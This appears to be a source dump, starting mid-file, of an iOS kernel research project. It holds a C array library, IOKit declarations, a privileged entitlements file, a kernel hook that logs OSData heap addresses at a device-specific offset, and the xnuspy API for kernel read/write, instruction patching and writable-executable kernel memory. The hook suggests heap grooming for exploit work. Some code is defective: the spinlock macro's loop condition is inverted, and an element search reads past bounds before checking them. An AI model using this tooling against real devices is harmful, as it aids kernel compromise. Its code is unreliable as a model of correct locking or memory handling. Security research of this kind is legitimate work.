sizeof(void *)); 58 | 59 | if(a->len >= a->capacity - 1){ 60 | a->capacity *= 2; 61 | 62 | void **items_rea = realloc(a->items, a->capacity * sizeof(void *)); 63 | a->items = items_rea; 64 | } 65 | 66 | a->items[a->len++] = elem; 67 | 68 | return ARRAY_OK; 69 | } 70 | 71 | int array_qsort(struct array *a, int (*compar)(const void *, const void *)){ 72 | if(!a) 73 | return ARRAY_NULL; 74 | 75 | qsort(a->items, a->len, sizeof(void *), compar); 76 | 77 | return ARRAY_OK; 78 | } 79 | 80 | static int _array_remove(struct array *a, int idx){ 81 | if(idx < 0 || idx >= a->len) 82 | return ARRAY_OOB; 83 | 84 | if(idx == a->len - 1){ 85 | a->len--; 86 | return ARRAY_OK; 87 | } 88 | 89 | void **start = a->items + idx; 90 | size_t bytes = ((a->items + a->len) - (start + 1)) * sizeof(void *); 91 | 92 | memmove(start, start + 1, bytes); 93 | 94 | a->len--; 95 | 96 | return ARRAY_OK; 97 | } 98 | 99 | int array_remove(struct array *a, int idx){ 100 | if(!a) 101 | return ARRAY_NULL; 102 | 103 | if(array_empty(a)) 104 | return ARRAY_OK; 105 | 106 | return _array_remove(a, idx); 107 | } 108 | 109 | int array_remove_elem(struct array *a, void *elem){ 110 | if(!a) 111 | return ARRAY_NULL; 112 | 113 | if(array_empty(a)) 114 | return ARRAY_OK; 115 | 116 | int elemidx = 0; 117 | 118 | while(a->items[elemidx] != elem && elemidx < a->len) 119 | elemidx++; 120 | 121 | return _array_remove(a, elemidx); 122 | } 123 | 124 | int array_safe_get(struct array *a, int idx, void **itemout){ 125 | if(!a) 126 | return ARRAY_NULL; 127 | 128 | if(idx < 0 || idx >= a->len) 129 | return ARRAY_OOB; 130 | 131 | *itemout = a->items[idx]; 132 | 133 | return ARRAY_OK; 134 | } 135 | 136 | int array_shrink_to_fit(struct array *a){ 137 | if(!a) 138 | return ARRAY_NULL; 139 | 140 | void **items_rea = realloc(a->items, a->len * sizeof(void *)); 141 | 142 | a->items = items_rea; 143 | a->capacity = a->len; 144 | 145 | return ARRAY_OK; 146 | } 147 | 148 | struct array *array_new(void){ 149 | struct array *a = 
malloc(sizeof(struct array)); 150 | 151 | a->items = NULL; 152 | a->len = 0; 153 | a->capacity = STARTING_CAPACITY; 154 | 155 | return a; 156 | } 157 | -------------------------------------------------------------------------------- /array.h: -------------------------------------------------------------------------------- 1 | #ifndef _ARRAY_H_ 2 | #define _ARRAY_H_ 3 | 4 | struct array { 5 | /* The items that make up the array */ 6 | void **items; 7 | 8 | /* How many items the array currently holds */ 9 | unsigned long len; 10 | 11 | /* The amount of memory allocated for this array. 12 | * Doubles every time a->len >= a->capacity - 1. */ 13 | unsigned long capacity; 14 | }; 15 | 16 | enum { 17 | ARRAY_OK = 0, ARRAY_NULL, ARRAY_OOB, ARRAY_KEY_NOT_FOUND 18 | }; 19 | 20 | int array_bsearch(struct array *, const void *, 21 | int (*)(const void *, const void *), void **); 22 | int array_clear(struct array *); 23 | int array_destroy(struct array **); 24 | int array_empty(struct array *); 25 | int array_insert(struct array *, void *); 26 | int array_qsort(struct array *, int (*)(const void *, const void *)); 27 | int array_remove(struct array *, int); 28 | int array_remove_elem(struct array *, void *); 29 | int array_safe_get(struct array *, int, void **); 30 | int array_shrink_to_fit(struct array *); 31 | 32 | struct array *array_new(void); 33 | 34 | #endif 35 | -------------------------------------------------------------------------------- /ent.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | com.apple.private.security.container-required 6 | 7 | platform-application 8 | 9 | com.apple.security.iokit-user-client-class 10 | 11 | AGXDeviceUserClient 12 | IOMobileFramebufferUserClient 13 | IOSurfaceRootUserClient 14 | 15 | com.apple.private.allow-explicit-graphics-priority 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /iokit.h: 
-------------------------------------------------------------------------------- 1 | #ifndef IOKIT_HEADER 2 | #define IOKIT_HEADER 3 | 4 | #include 5 | #include 6 | #include 7 | 8 | typedef mach_port_t io_object_t; 9 | typedef io_object_t io_connect_t; 10 | typedef io_object_t io_enumerator_t; 11 | typedef io_object_t io_iterator_t; 12 | typedef io_object_t io_registry_entry_t; 13 | typedef io_object_t io_service_t; 14 | typedef io_object_t io_registry_entry_t; 15 | typedef char io_name_t[128]; 16 | typedef char io_string_t[512]; 17 | 18 | #define IO_OBJECT_NULL ((io_object_t) 0) 19 | 20 | typedef uint32_t IOOptionBits; 21 | 22 | /* IOKit/IOKitLib.h */ 23 | extern CFMutableDictionaryRef IORegistryEntryIDMatching(uint32_t service_id); 24 | extern const mach_port_t kIOMasterPortDefault; 25 | 26 | extern CFMutableDictionaryRef IOServiceMatching(const char *name); 27 | 28 | extern io_service_t IOServiceGetMatchingService(mach_port_t masterPort, 29 | CFDictionaryRef matching); 30 | 31 | extern kern_return_t IOServiceGetMatchingServices(mach_port_t, CFMutableDictionaryRef, 32 | io_iterator_t); 33 | 34 | extern kern_return_t IORegistryEntryGetName(io_registry_entry_t entry, io_name_t name); 35 | 36 | extern io_object_t IOIteratorNext(io_iterator_t iterator); 37 | 38 | extern kern_return_t IOConnectSetNotificationPort(io_connect_t connect, 39 | uint32_t type, mach_port_t port, uintptr_t reference); 40 | 41 | extern io_registry_entry_t IORegistryEntryFromPath(mach_port_t masterPort, 42 | const io_string_t path); 43 | 44 | extern int IOIteratorIsValid(io_iterator_t); 45 | 46 | extern kern_return_t IOObjectGetClass(io_object_t object, io_name_t className); 47 | 48 | extern kern_return_t IOServiceOpen(io_service_t service, task_port_t owningTask, 49 | uint32_t type, io_connect_t *connect); 50 | 51 | extern kern_return_t IOConnectMapMemory64(io_connect_t connect, uint32_t memoryType, 52 | mach_port_t intoTask, mach_vm_address_t *atAddress, mach_vm_size_t *ofSize, 53 | uint32_t 
options); 54 | 55 | extern kern_return_t IOConnectUnmapMemory64(io_connect_t connect, uint32_t memoryType, 56 | task_port_t fromTask, mach_vm_address_t atAddress); 57 | 58 | extern io_registry_entry_t IORegistryGetRootEntry(mach_port_t masterPort); 59 | 60 | extern CFTypeRef IORegistryEntrySearchCFProperty(io_registry_entry_t entry, 61 | const io_name_t plane, CFStringRef key, CFAllocatorRef allocator, IOOptionBits options); 62 | 63 | extern CFTypeRef IORegistryEntryCreateCFProperty(io_registry_entry_t entry, 64 | CFStringRef key, CFAllocatorRef allocator, IOOptionBits options); 65 | 66 | extern kern_return_t IOConnectCallScalarMethod(mach_port_t connection, 67 | uint32_t selector, const uint64_t *input, uint32_t inputCnt, 68 | uint64_t *output, uint32_t *outputCnt); 69 | 70 | extern kern_return_t IOConnectCallStructMethod(mach_port_t connection, 71 | uint32_t selector, const void *inputStruct, size_t inputStructCnt, 72 | void *outputStruct, size_t *outputStructCnt); 73 | 74 | extern kern_return_t IOConnectCallAsyncMethod(mach_port_t connection, 75 | uint32_t selector, mach_port_t wake_port, uint64_t *reference, 76 | uint32_t referenceCnt, const uint64_t *input, uint32_t inputCnt, 77 | const void *inputStruct, size_t inputStructCnt, uint64_t *output, 78 | uint32_t *outputCnt, void *outputStruct, size_t *outputStructCnt); 79 | 80 | extern kern_return_t IOConnectCallMethod(mach_port_t connection, uint32_t selector, 81 | const uint64_t *input, uint32_t inputCnt, const void *inputStruct, 82 | size_t inputStructCnt, uint64_t *output, uint32_t *outputCnt, 83 | void *outputStruct, size_t *outputStructCnt); 84 | 85 | 86 | 87 | extern kern_return_t IOConnectTrap0(io_connect_t connect, uint32_t index); 88 | extern kern_return_t IOConnectTrap1(io_connect_t connect, uint32_t index, uintptr_t p1); 89 | extern kern_return_t IOConnectTrap2(io_connect_t connect, uint32_t index, uintptr_t p1, 90 | uintptr_t p2); 91 | extern kern_return_t IOConnectTrap3(io_connect_t connect, 
uint32_t index, uintptr_t p1, 92 | uintptr_t p2, uintptr_t p3); 93 | extern kern_return_t IOConnectTrap4(io_connect_t connect, uint32_t index, uintptr_t p1, 94 | uintptr_t p2, uintptr_t p3, uintptr_t p4); 95 | extern kern_return_t IOConnectTrap5(io_connect_t connect, uint32_t index, uintptr_t p1, 96 | uintptr_t p2, uintptr_t p3, uintptr_t p4, uintptr_t p5); 97 | extern kern_return_t IOConnectTrap6(io_connect_t connect, uint32_t index, uintptr_t p1, 98 | uintptr_t p2, uintptr_t p3, uintptr_t p4, uintptr_t p5, uintptr_t p6); 99 | 100 | extern kern_return_t IOConnectAddClient(io_connect_t connect, io_connect_t client); 101 | 102 | extern kern_return_t IOServiceClose(io_connect_t connect); 103 | 104 | enum { 105 | kOSSerializeDictionary = 0x01000000U, 106 | kOSSerializeArray = 0x02000000U, 107 | kOSSerializeSet = 0x03000000U, 108 | kOSSerializeNumber = 0x04000000U, 109 | kOSSerializeSymbol = 0x08000000U, 110 | kOSSerializeString = 0x09000000U, 111 | kOSSerializeData = 0x0a000000U, 112 | kOSSerializeBoolean = 0x0b000000U, 113 | kOSSerializeObject = 0x0c000000U, 114 | kOSSerializeTypeMask = 0x7F000000U, 115 | kOSSerializeDataMask = 0x00FFFFFFU, 116 | kOSSerializeEndCollection = 0x80000000U, 117 | kOSSerializeBinarySignature = 0x000000d3U, 118 | }; 119 | 120 | struct IOKitDiagnosticsParameters { 121 | size_t size; 122 | uint64_t value; 123 | uint32_t options; 124 | uint32_t tag; 125 | uint32_t zsize; 126 | uint32_t reserved[8]; 127 | }; 128 | 129 | typedef struct IOKitDiagnosticsParameters IOKitDiagnosticsParameters; 130 | 131 | enum{ 132 | kIOTrackingCallSiteBTs = 16, 133 | }; 134 | 135 | struct IOTrackingCallSiteInfo { 136 | uint32_t count; 137 | pid_t addressPID; 138 | mach_vm_address_t address; 139 | mach_vm_size_t size[2]; 140 | pid_t btPID; 141 | mach_vm_address_t bt[2][kIOTrackingCallSiteBTs]; 142 | }; 143 | 144 | enum{ 145 | kIOTrackingExcludeNames = 0x00000001, 146 | }; 147 | 148 | enum{ 149 | kIOTrackingGetTracking = 0x00000001, 150 | kIOTrackingGetMappings = 
0x00000002, 151 | kIOTrackingResetTracking = 0x00000003, 152 | kIOTrackingStartCapture = 0x00000004, 153 | kIOTrackingStopCapture = 0x00000005, 154 | kIOTrackingSetMinCaptureSize = 0x00000006, 155 | kIOTrackingLeaks = 0x00000007, 156 | kIOTrackingInvalid = 0xFFFFFFFE, 157 | }; 158 | enum { 159 | kIODefaultMemoryType = 0 160 | }; 161 | 162 | enum { 163 | kIODefaultCache = 0, 164 | kIOInhibitCache = 1, 165 | kIOWriteThruCache = 2, 166 | kIOCopybackCache = 3, 167 | kIOWriteCombineCache = 4, 168 | kIOCopybackInnerCache = 5, 169 | kIOPostedWrite = 6, 170 | kIORealTimeCache = 7, 171 | kIOPostedReordered = 8, 172 | kIOPostedCombinedReordered = 9, 173 | }; 174 | 175 | enum { 176 | kIOMapAnywhere = 0x00000001, 177 | 178 | kIOMapCacheMask = 0x00000f00, 179 | kIOMapCacheShift = 8, 180 | kIOMapDefaultCache = kIODefaultCache << kIOMapCacheShift, 181 | kIOMapInhibitCache = kIOInhibitCache << kIOMapCacheShift, 182 | kIOMapWriteThruCache = kIOWriteThruCache << kIOMapCacheShift, 183 | kIOMapCopybackCache = kIOCopybackCache << kIOMapCacheShift, 184 | kIOMapWriteCombineCache = kIOWriteCombineCache << kIOMapCacheShift, 185 | kIOMapCopybackInnerCache = kIOCopybackInnerCache << kIOMapCacheShift, 186 | kIOMapPostedWrite = kIOPostedWrite << kIOMapCacheShift, 187 | kIOMapRealTimeCache = kIORealTimeCache << kIOMapCacheShift, 188 | kIOMapPostedReordered = kIOPostedReordered << kIOMapCacheShift, 189 | kIOMapPostedCombinedReordered = kIOPostedCombinedReordered << kIOMapCacheShift, 190 | 191 | kIOMapUserOptionsMask = 0x00000fff, 192 | 193 | kIOMapReadOnly = 0x00001000, 194 | 195 | kIOMapStatic = 0x01000000, 196 | kIOMapReference = 0x02000000, 197 | kIOMapUnique = 0x04000000, 198 | kIOMapPrefault = 0x10000000, 199 | kIOMapOverwrite = 0x20000000 200 | }; 201 | #endif 202 | -------------------------------------------------------------------------------- /kernel_hooks.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | 
void *g_osdata_kaddrs[8000]; 6 | uint64_t g_osdata_kaddrs_idx = 0; 7 | bool g_record_osdata_kaddrs = false; 8 | 9 | uint64_t kernel_slide = 0; 10 | 11 | kern_return_t (*kernel_memory_allocate)(void *, uint64_t *, uint64_t, 12 | uint64_t, uint64_t, uint32_t); 13 | 14 | kern_return_t _kernel_memory_allocate(void *map, uint64_t *addrp, 15 | uint64_t size, uint64_t mask, uint64_t flags, uint32_t tag){ 16 | uint64_t caller = (uint64_t)__builtin_return_address(0) - kernel_slide; 17 | 18 | kern_return_t kret = kernel_memory_allocate(map, addrp, size, mask, 19 | flags, tag); 20 | 21 | /* if(caller == 0xfffffff007fc0f24){ */ 22 | /* XXX iphone se 14.7 below */ 23 | if(caller == 0xfffffff007658300){ 24 | uint64_t osdata_mem = *addrp; 25 | 26 | if(size == 0x10000 && g_record_osdata_kaddrs){ 27 | g_osdata_kaddrs[g_osdata_kaddrs_idx] = (void *)osdata_mem; 28 | g_osdata_kaddrs_idx++; 29 | } 30 | } 31 | 32 | return kret; 33 | } 34 | -------------------------------------------------------------------------------- /kernel_hooks.h: -------------------------------------------------------------------------------- 1 | #ifndef KERNEL_HOOKS 2 | #define KERNEL_HOOKS 3 | 4 | #include 5 | #include 6 | 7 | kern_return_t (*kernel_memory_allocate)(void *, uint64_t *, uint64_t, uint64_t, uint64_t, uint32_t); 8 | kern_return_t _kernel_memory_allocate(void *map, uint64_t *addrp, 9 | uint64_t size, uint64_t mask, uint64_t flags, uint32_t tag); 10 | 11 | #endif 12 | -------------------------------------------------------------------------------- /xnuspy_ctl.h: -------------------------------------------------------------------------------- 1 | #ifndef XNUSPY_CTL 2 | #define XNUSPY_CTL 3 | 4 | #include 5 | 6 | /* Flavors for xnuspy_ctl */ 7 | enum { 8 | XNUSPY_CHECK_IF_PATCHED = 0, 9 | XNUSPY_INSTALL_HOOK, 10 | XNUSPY_REGISTER_DEATH_CALLBACK, 11 | XNUSPY_CALL_HOOKME, 12 | XNUSPY_CACHE_READ, 13 | XNUSPY_KREAD, 14 | XNUSPY_KWRITE, 15 | XNUSPY_GET_CURRENT_THREAD, 16 | #ifdef XNUSPY_PRIVATE 17 | 
    XNUSPY_MAX_FLAVOR = XNUSPY_GET_CURRENT_THREAD,
#endif
};

/* Values for XNUSPY_CACHE_READ - keep this alphabetical so it's
 * easier to find things.
 * NOTE: these are positional enum values — never reorder existing
 * members, only append. */

#ifdef XNUSPY_PRIVATE
enum xnuspy_cache_id {
#else
enum {
#endif
    /* struct proclist allproc @ bsd/sys/proc_internal.h */
    ALLPROC = 0,
    BCOPY_PHYS,
    BZERO,
    COPYIN,
    COPYINSTR,
    COPYOUT,

    /* Identical to XNU's implementation */
    CURRENT_MAP,

    CURRENT_PROC,

    /* Only valid for iOS 14.5 - iOS 14.8, inclusive. EINVAL will be
     * returned otherwise. */
    IO_LOCK,

    /* Only valid for iOS 15.x. EINVAL will be returned otherwise. */
    IPC_OBJECT_LOCK,

    IOLOG,
    IOSLEEP,

    /* Only valid for < iOS 14.5. EINVAL will be returned otherwise. */
    IPC_PORT_RELEASE_SEND,

    /* Only valid for >= iOS 14.5. EINVAL will be returned otherwise. */
    IPC_PORT_RELEASE_SEND_AND_UNLOCK,

    /* Selects the correct way to release a send right based on the
     * kernel version. Parameters are the same as XNU's
     * ipc_port_release_send. */
    IPC_PORT_RELEASE_SEND_WRAPPER,

    /* Only valid for iOS 13.x. EINVAL will be returned otherwise. */
    KALLOC_CANBLOCK,

    /* Only valid for iOS 14.x and iOS 15.x. EINVAL will be returned
     * otherwise. */
    KALLOC_EXTERNAL,

    /* vm_map_t kernel_map @ osfmk/vm/vm_kern.h */
    KERNEL_MAP,

    KERNEL_THREAD_START,

    /* Only valid for iOS 13.x. EINVAL will be returned otherwise. */
    KFREE_ADDR,

    /* Only valid for iOS 14.x and iOS 15.x. EINVAL will be returned
     * otherwise. */
    KFREE_EXT,

    KPRINTF,
    LCK_GRP_ALLOC_INIT,
    LCK_GRP_FREE,
    LCK_MTX_LOCK,
    LCK_MTX_UNLOCK,
    LCK_RW_ALLOC_INIT,
    LCK_RW_DONE,
    LCK_RW_FREE,
    LCK_RW_LOCK_EXCLUSIVE,
    LCK_RW_LOCK_SHARED,
    LCK_RW_LOCK_SHARED_TO_EXCLUSIVE,
    MACH_MAKE_MEMORY_ENTRY_64,
    MACH_TO_BSD_ERRNO,
    MACH_VM_MAP_EXTERNAL,
    MEMCHR,
    MEMCMP,
    MEMMEM,
    MEMMOVE,
    MEMRCHR,
    MEMSET,
    PANIC,
    PHYSTOKV,

    /* Selects the correct way to take proc_list_mlock based
     * on the kernel version.
     *
     * void proc_list_lock(void);
     *
     */
    PROC_LIST_LOCK,

    /* lck_mtx_t *proc_list_mlock @ bsd/sys/proc_internal.h */
    PROC_LIST_MLOCK,

    /* Selects the correct way to release proc_list_mlock based
     * on the kernel version.
     *
     * void proc_list_unlock(void);
     *
     */
    PROC_LIST_UNLOCK,

    PROC_NAME,
    PROC_PID,

    /* Only valid for 15.x. EINVAL will be returned otherwise.
     * Until 15 sources come out, here's what I think the function
     * signature is:
     *
     * proc_t proc_ref(proc_t proc, bool holding_proc_list_mlock);
     *
     * You can find a call to it in proc_exit. It looks like it is good
     * practice to make sure the returned proc pointer was the same one
     * as you passed in. Not sure what the return value being different
     * than the first parameter indicates... */
    PROC_REF,

    /* Only valid for 13.x and 14.x. EINVAL will be returned otherwise.
     * This function assumes the caller holds proc_list_mlock. */
    PROC_REF_LOCKED,

    /* Selects the correct way to take a reference on a proc structure
     * based on the kernel version.
     *
     * void *proc_ref_wrapper(void *proc, bool holding_proc_list_mlock);
     *
     * If you are on iOS 13.x or iOS 14.x and you pass false for the
     * second parameter, this function takes proc_list_mlock before
     * calling proc_ref_locked and releases it after that returns. If
     * you are on iOS 15.x, this tail calls proc_ref. Return value
     * is either the return value of proc_ref or proc_ref_locked. */
    PROC_REF_WRAPPER,

    /* Only valid for 15.x. EINVAL will be returned otherwise.
     * This function assumes the caller DOES NOT hold proc_list_mlock,
     * though I'm not sure if it's safe to hold that mutex and call this
     * function.
     * Until 15 sources come out, here's the function signature:
     *
     * int proc_rele(proc_t proc);
     *
     * Seems to always return 0. */
    PROC_RELE,

    /* Only valid for 13.x and 14.x. EINVAL will be returned otherwise.
     * This function assumes the caller holds proc_list_mlock. */
    PROC_RELE_LOCKED,

    /* Selects the correct way to release a reference on a proc structure
     * based on the kernel version.
     *
     * int proc_rele_wrapper(void *proc, bool holding_proc_list_mlock);
     *
     * If you are on iOS 13.x or iOS 14.x and you pass false for the
     * second parameter, this function takes proc_list_mlock before
     * calling proc_rele_locked and releases it after that returns. If
     * you are on iOS 15.x, this tail calls proc_rele and the second
     * parameter is ignored. Return value is either the return value
     * of proc_ref (for iOS 15.x) or zero (for iOS 13.x and iOS 14.x) */
    PROC_RELE_WRAPPER,

    PROC_UNIQUEID,
    SNPRINTF,
    STRCHR,
    STRRCHR,
    STRCMP,
    STRLEN,
    STRNCMP,
    STRSTR,
    STRNSTR,
    THREAD_DEALLOCATE,
    THREAD_TERMINATE,
    VM_ALLOCATE_EXTERNAL,
    VM_DEALLOCATE,
    VM_MAP_DEALLOCATE,

    /* Identical to XNU's implementation */
    VM_MAP_REFERENCE,

    /* Only valid for 13.x and 14.x. EINVAL will be returned otherwise. */
    VM_MAP_UNWIRE,

    /* Only valid for 15.x. EINVAL will be returned otherwise. */
    VM_MAP_UNWIRE_NESTED,

    /* Selects the correct way to unwire a vm_map based on the
     * kernel version. Parameters are the same as XNU's vm_map_unwire. */
    VM_MAP_UNWIRE_WRAPPER,

    VM_MAP_WIRE_EXTERNAL,

    /* --------------------------------------------
     * Everything above (with the exception of the small wrapper functions)
     * is from XNU, everything below are things from xnuspy you may
     * find useful
     * ---------------------------------------------
     */

    /* uint64_t *el0_ptep(void *uaddr)
     *
     * Given a user virtual address, this function returns a pointer to its
     * page table entry.
     *
     * Parameters:
     *  uaddr: user virtual address.
     *
     * Returns:
     *  Kernel virtual address of page table entry for uaddr.
     */
    EL0_PTEP,

    /* uint64_t *el1_ptep(void *kaddr)
     *
     * Given a kernel virtual address, this function returns a pointer to its
     * page table entry.
     *
     * Parameters:
     *  kaddr: kernel virtual address.
     *
     * Returns:
     *  Kernel virtual address of page table entry for kaddr.
     */
    EL1_PTEP,

    /* void hookme(void *arg)
     *
     * This function is a stub for you to hook to easily gain kernel code
     * execution without having to hook an actual kernel function. You can
     * get xnuspy to call it by invoking xnuspy_ctl with the
     * XNUSPY_CALL_HOOKME flavor.
     */
    HOOKME,

    /* uint64_t iOS_version
     *
     * This variable contains the major from the "Darwin Kernel Version"
     * string. On iOS 13.x, this is 19, on iOS 14.x, this is 20, and
     * on iOS 15.x, this is 21. */
    IOS_VERSION,

    /* uint64_t kernel_slide
     *
     * KASLR slide */
    KERNEL_SLIDE,

    /* uint64_t kern_version_minor
     *
     * This variable contains the minor from the "Darwin Kernel Version"
     * string. */
    KERN_VERSION_MINOR,

    /* int kprotect(void *kaddr, uint64_t size, vm_prot_t prot)
     *
     * Change protections of kernel memory at the page table level.
     * You are allowed to make writable, executable memory.
     *
     * Parameters:
     *  kaddr: kernel virtual address of target.
     *  size: the number of bytes in the target region.
     *  prot: protections to apply. Only VM_PROT_READ, VM_PROT_WRITE, and
     *      VM_PROT_EXECUTE are respected.
     *
     * Returns:
     *  Zero if successful, non-zero otherwise.
     */
    KPROTECT,

    /* uint64_t kvtophys(uint64_t kaddr)
     *
     * Convert a kernel (EL1) virtual address to a physical address.
     *
     * Parameters:
     *  kaddr: kernel virtual address.
     *
     * Returns:
     *  Non-zero if address translation was successful, zero otherwise.
     */
    KVTOPHYS,

    /* void kwrite_instr(uint64_t addr, uint32_t instr)
     *
     * Patch a single instruction of executable kernel code. This function
     * handles permissions, data cache cleaning, and instruction cache
     * invalidation.
     *
     * Parameters:
     *  addr: kernel virtual address.
     *  instr: new instruction for addr.
     */
    KWRITE_INSTR,

    /* void kwrite_static(void *dst, void *buf, size_t sz)
     *
     * Write to static kernel memory, using bcopy_phys.
     *
     * Parameters:
     *  dst: kernel virtual address of destination.
     *  buf: kernel virtual address of data.
     *  sz: how many bytes 'buf' is.
     */
    KWRITE_STATIC,

    /* The next three functions deal with shared memory. KTOU ("kernel to
     * user") and UTOK ("user to kernel") specify the "direction". "'a' to
     * 'b'", where 'a' and 'b' are both vm_map pointers, means pages from
     * 'a' will be mapped into 'b' as shared memory. Pages from 'a' must
     * have been allocated via vm_allocate for these functions to succeed.
     * KTOU and UTOK automatically select the 'a' and 'b' vm_map pointers
     * for convenience. The RAW variant allows you to specify the 'a' and
     * 'b' vm_map pointers. You would use mkshmem_raw when you are unsure
     * of current_task()->map or the current CPU's TTBR0 inside your kernel
     * code.
     *
     * int mkshmem_ktou(uint64_t kaddr, uint64_t sz, vm_prot_t prot,
     *      struct xnuspy_shmem *shmemp);
     * int mkshmem_utok(uint64_t uaddr, uint64_t sz, vm_prot_t prot,
     *      struct xnuspy_shmem *shmemp);
     * int mkshmem_raw(uint64_t addr, uint64_t sz, vm_prot_t prot,
     *      vm_map_t from, vm_map_t to, struct xnuspy_shmem *shmemp);
     *
     * Parameters (for all three):
     *  kaddr/uaddr/addr: virtual address somewhere inside 'a'
     *  sz:               page aligned mapping size
     *  prot:             virtual protections to apply to the created
     *                    shared mapping
     *  shmemp:           returned shmem. The structure definition can
     *                    be found at the end of this file.
     *
     * Parameters specific to mkshmem_raw:
     *  from: source map, aka 'a'
     *  to:   destination map, aka 'b'
     *
     * Returns (for all three):
     *  Zero on success (and populated shmemp structure), non-zero BSD errno
     *  on failure.
     *
     * Other notes:
     *  These functions use kprotect to apply VM protections, so any
     *  combination of those are allowed. VM protections are only applied
     *  to the newly-created mapping, not the source pages that came
     *  from 'a'.
     */
    MKSHMEM_KTOU,
    MKSHMEM_UTOK,
    MKSHMEM_RAW,

    /* offsetof(struct thread, map), vm_map_t */
    OFFSETOF_STRUCT_THREAD_MAP,

    /* offsetof(struct _vm_map, map_refcnt), int (yes, int) */
    OFFSETOF_STRUCT_VM_MAP_REFCNT,

    /* int shmem_destroy(struct xnuspy_shmem *shmemp);
     *
     * Destroy shared memory returned by mkshmem_ktou, mkshmem_utok, or
     * mkshmem_raw.
     *
     * Parameters:
     *  shmemp: pointer to shmem structure
     *
     * Returns:
     *  Zero on success, non-zero BSD errno on failure.
     */
    SHMEM_DESTROY,

    /* void tlb_flush(void)
     *
     * After modifying a page table, call this function to invalidate
     * the TLB.
     */
    TLB_FLUSH,

    /* The next two functions abstract away the different kalloc/kfree pairs
     * for different iOS versions and keeps track of allocation sizes. This
     * creates an API like malloc/free. Pointers returned from unified_kalloc
     * can only be freed with unified_kfree, and pointers returned by other
     * memory allocation functions cannot be freed with unified_kfree.
     *
     * uint8_t *buf = unified_kalloc(0x200);
     *
     * if(!buf)
     *     (handle allocation failure)
     *
     * buf[0] = '\0';
     *
     * unified_kfree(buf);
     *
     * -------------------------------
     *
     * void *unified_kalloc(size_t sz)
     *
     * Parameters:
     *  sz: allocation size.
     *
     * Returns:
     *  Upon success, a pointer to memory. If we are on 13.x, kalloc_canblock's
     *  canblock parameter is false. Upon failure, NULL.
     *
     * -------------------------------
     *
     * void unified_kfree(void *ptr)
     *
     * Parameters:
     *  ptr: a pointer returned from unified_kalloc.
     */
    UNIFIED_KALLOC,
    UNIFIED_KFREE,

    /* int uprotect(void *uaddr, uint64_t size, vm_prot_t prot)
     *
     * Change protections of user memory at the page table level.
     * You are allowed to make writable, executable memory.
     *
     * Parameters:
     *  uaddr: user virtual address of target.
     *  size: the number of bytes in the target region.
     *  prot: protections to apply. Only VM_PROT_READ, VM_PROT_WRITE, and
     *      VM_PROT_EXECUTE are respected.
     *
     * Returns:
     *  Zero if successful, non-zero otherwise.
     */
    UPROTECT,

    /* uint64_t uvtophys(uint64_t uaddr)
     *
     * Convert a user (EL0) virtual address to a physical address.
     *
     * Parameters:
     *  uaddr: user virtual address.
     *
     * Returns:
     *  Non-zero if address translation was successful, zero otherwise.
     */
    UVTOPHYS,

#ifdef XNUSPY_PRIVATE
    MAX_CACHE = UVTOPHYS,
#endif
};

#define iOS_13_x (19)
#define iOS_14_x (20)
#define iOS_15_x (21)

/* Structures for locks that work in both kernelspace and userspace.
467 | * Any locks you declare must be declared globally so they 468 | * are mapped as shared memory when you install your kernel hooks */ 469 | /* kuslck_t: a simple spinlock */ 470 | typedef struct { 471 | uint32_t word; 472 | } kuslck_t; 473 | 474 | #define KUSLCK_UNLOCKED (0) 475 | #define KUSLCK_LOCKED (1) 476 | 477 | /* kuslck_t lck = KUSLCK_INITIALIZER; */ 478 | #define KUSLCK_INITIALIZER { .word = KUSLCK_UNLOCKED } 479 | 480 | #define kuslck_lock(lck) \ 481 | do { \ 482 | while(__atomic_exchange_n(&(lck).word, KUSLCK_LOCKED, \ 483 | __ATOMIC_ACQ_REL) == 0){} \ 484 | } while (0) \ 485 | 486 | #define kuslck_unlock(lck) \ 487 | do { \ 488 | __atomic_store_n(&(lck).word, KUSLCK_UNLOCKED, __ATOMIC_RELEASE); \ 489 | } while (0) \ 490 | 491 | struct xnuspy_shmem { 492 | /* Base of shared memory */ 493 | void *shm_base; 494 | /* Size of shared memory, page multiple */ 495 | uint64_t shm_sz; 496 | #ifdef XNUSPY_PRIVATE 497 | /* Memory entry for the shared memory, ipc_port_t */ 498 | void *shm_entry; 499 | /* The vm_map_t which the source pages belong to */ 500 | void *shm_map_from; 501 | /* The vm_map_t which the source pages were mapped into */ 502 | void *shm_map_to; 503 | #else 504 | void *opaque[3]; 505 | #endif 506 | }; 507 | 508 | #endif 509 | --------------------------------------------------------------------------------